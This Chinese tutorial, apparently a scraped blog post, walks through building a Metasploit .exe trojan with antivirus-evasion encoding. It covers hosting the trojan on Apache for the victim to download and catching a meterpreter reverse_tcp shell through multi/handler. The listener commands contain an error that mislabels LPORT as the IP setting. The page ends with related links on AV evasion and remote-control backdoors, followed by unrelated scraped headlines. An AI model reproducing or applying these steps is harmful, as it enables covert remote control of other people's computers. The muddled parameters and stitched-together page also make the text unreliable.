思路:使用kali工具msf制作exe木马文件靶机通过点击开启后门进行监听

原理:靶机执行木马文件后,向本机(你运行msf的主机)中发送信息建立会话session,本机打开监听状态,收到信息后进行操作

前提:知道主机IP(命令行输入ifconfig)

(1)msf制作木马

输入命令行生成木马exe并保存在var/www/html文件中,这样靶机就可以直接从网页中下载木马

命令行中参数意义:

其中-e x86/Shikata_ga_nai 也就是起到所谓的免杀作用,

然后开启apache服务:(要记住开启apache服务不然无法与外界连接)

(2)靶机下载运行木马本机进行监听

靶机在浏览器中输入192.168.40.140/test.exe(你自己命令行中的IP和文件名)就可以自行     下载木马

主机打开msf

设置一些监听参数:

use exploit/multi/handler只进入侦听模式

set payload windows/meterpreter/reverse_tcp 设定payload选择漏洞利用模块

set LPORT xxxxx 设置自己ip

set LPORT XXXX 指定端口

输入run运行后靶机双击exe运行即可进行监听

其余还有查看靶机屏幕或者控制的其他命令可以自行查询使用

msf获取靶机shell进行远控相关推荐

  1. Veil生成免杀payload 渗透win10 获取靶机shell

    一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...

  2. MSF+内网穿透 实现远控

    网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明 ...

  3. 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图

    永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...

  4. 用nc+简单bat/vbs脚本+winrar制作迷你远控后门

    前言 某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念. 我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接. 真正的远控还没实践过,所以决定写个小后门试一试. ...

  5. Badusb原理及制作并简单免杀实现远控教程

    2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb的攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种" ...

  6. msf之msfvenom的使用—使用Kali渗透工具生成远控木马

    一.先解释一下 msfvenom取代了msfpayload和msfencode,常用于生成远控木马,在目标机器上执行后门,在本地机器kali中监听上线. (注意:msfvenom是在shell里使用的 ...

  7. 远控免杀专题文章(3)-msf自免杀(VT免杀率35/69)

    原文链接:远控免杀专题文章(3)-msf自免杀(VT免杀率35/69) 免杀能力一览表 几点说明: 1.上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效 ...

  8. DHCP动态获取及PC远控路由交换机实验

    拓扑 部署 先给左边1.0网段的两台pc配置好静态IP地址及其网关 之后配置右边DHCP服务器让右边2.0网段的两个PC可以自动获取IP地址 先配置DHCP服务器 开启DHCP服务并添加 之后我们可以 ...

  9. 使用远见远控软件控制靶机

    控制端:运行在攻击者的电脑中,负责控制其他肉鸡 被控制端:需要生成,与你行在肉鸡上,木马病毒 两端需要数据互通 打开远见,在系统设置里修改密码后重启 然后打开hfs 右键,选择添加文件,将consys ...

最新文章

  1. Gazebo构建小车模型并通过ROS控制
  2. 超越百度的口罩检测算法
  3. Webpack 源码学习系列(一)
  4. c语言地理坐标存储 转发,纬度/经度坐标的2个列表之间的地理距离
  5. Python协程:从yield/send到async/await
  6. U盘的热拔插/自动挂载跟linux2.6 kernel、 udev、 hal、 dbus 、gnome-mount 、thunar的关系...
  7. 云专网和云专线的区别_云专线的优势及应用场景
  8. 广州运营开放式数据交易平台发力大数据业务
  9. Android P2P语音通话实现 【转】http://macleo.iteye.com/blog/1707455
  10. bzoj 2151 种树 —— 思路+链表
  11. java文件转base64
  12. 数学基础二:点到直线距离公式推导
  13. python为什么卸载不了_为什么Python3.8删除不了?
  14. 前端工程中常用的文件夹命名(扫盲帖)
  15. 自适应网站设计中的关键要点
  16. python换零钱_Python算法之零钱兑换问题的解法
  17. C++检测内存泄漏方法
  18. POJ3420-Quad Tiling
  19. 概率论与数理统计系列笔记之第六章——参数估计
  20. 2016年底江浙沪绕行游记

热门文章

  1. C++ 命名空间,也有叫名称空间
  2. 知衣科技CEO郑泽宇:重新定义服装产业「柔性供应链」
  3. #visual studio# 运行库MT、MTd、MD、MDd
  4. 首款搭载鸿蒙系统的车型,国内|网曝首款搭载华为鸿蒙OS的汽车为吉利博越Pro新车 | 电车汇...
  5. 理解PBR:从原理到实现(上)
  6. 时序数据库与传统数据库的优势
  7. 分辨率PPI(Pixel Per Inch)与DPI(Dot Per Inch)
  8. Sentinel限流规则使用总结
  9. 《PostgreSQL 开发指南》第 08 篇 备份与恢复
  10. 计算机表格求和求平均值公式,EXCEL怎么求和,还有求平均值?,excle求和平均